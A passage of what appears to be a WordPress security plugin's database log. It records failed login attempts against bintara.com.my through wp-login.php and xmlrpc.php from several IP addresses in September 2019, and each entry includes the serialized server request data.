05:25:43',17744640,19228432,'https://bintara.com.my/wp-login.php',1,0,'139.59.136.84'),(24409,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.136.84\";s:11:\"REMOTE_PORT\";s:5:\"44774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBuVh@uZ4OC5N1Fn8FEWgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697943.0332\";s:12:\"REQUEST_TIME\";s:10:\"1568697943\";}}','notice','2019-09-17 05:25:45','2019-09-17 05:25:43',17905464,19228432,'https://bintara.com.my/wp-login.php',1,0,'139.59.136.84'),(24410,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.136.84\";s:11:\"REMOTE_PORT\";s:5:\"45700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBuWtK-omY048@iBsMu1AAAAMs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697946.6999\";s:12:\"REQUEST_TIME\";s:10:\"1568697946\";}}','notice','2019-09-17 05:25:48','2019-09-17 05:25:47',18257328,19555584,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.136.84'),(24411,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"60192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBukB@uZ4OC5N1Fn8FEbAAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568698000.916\";s:12:\"REQUEST_TIME\";s:10:\"1568698000\";}}','notice','2019-09-17 05:26:42','2019-09-17 05:26:41',17739472,19229424,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(24412,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"60678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBuk9K-omY048@iBsMu2gAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568698004.0688\";s:12:\"REQUEST_TIME\";s:10:\"1568698004\";}}','notice','2019-09-17 05:26:45','2019-09-17 05:26:44',18255792,19552736,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(24413,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.134.246\";s:11:\"REMOTE_PORT\";s:5:\"52512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBwXdVIJ66zPtjtaf0MWgAAAUU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568698461.4218\";s:12:\"REQUEST_TIME\";s:10:\"1568698461\";}}','notice','2019-09-17 05:34:22','2019-09-17 05:34:21',17737648,19227872,'https://bintara.com.my/wp-login.php',1,0,'132.148.134.246'),(24414,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.134.246\";s:11:\"REMOTE_PORT\";s:5:\"54448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBwYNVIJ66zPtjtaf0MXwAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568698464.5503\";s:12:\"REQUEST_TIME\";s:10:\"1568698464\";}}','notice','2019-09-17 05:34:25','2019-09-17 05:34:24',18255424,19555152,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.134.246'),(24415,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"33476\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYByC7Ip53uPsY7BKArRtgAAAFM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568698891.8425\";s:12:\"REQUEST_TIME\";s:10:\"1568698891\";}}','notice','2019-09-17 05:41:33','2019-09-17 05:41:32',17739408,19229424,'https://bintara.com.my/wp-login.php',1,0,'45.252.248.161'),(24416,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"33942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYByDg99C9j9bhK9KplJTgAAARA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568698894.2689\";s:12:\"REQUEST_TIME\";s:10:\"1568698894\";}}','notice','2019-09-17 05:41:36','2019-09-17 05:41:34',18255792,19552736,'https://bintara.com.my/xmlrpc.php',1,0,'45.252.248.161'),(24417,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"33474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBzwQ99C9j9bhK9KplJmwAAAQs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568699329.7154\";s:12:\"REQUEST_TIME\";s:10:\"1568699329\";}}','notice','2019-09-17 05:48:51','2019-09-17 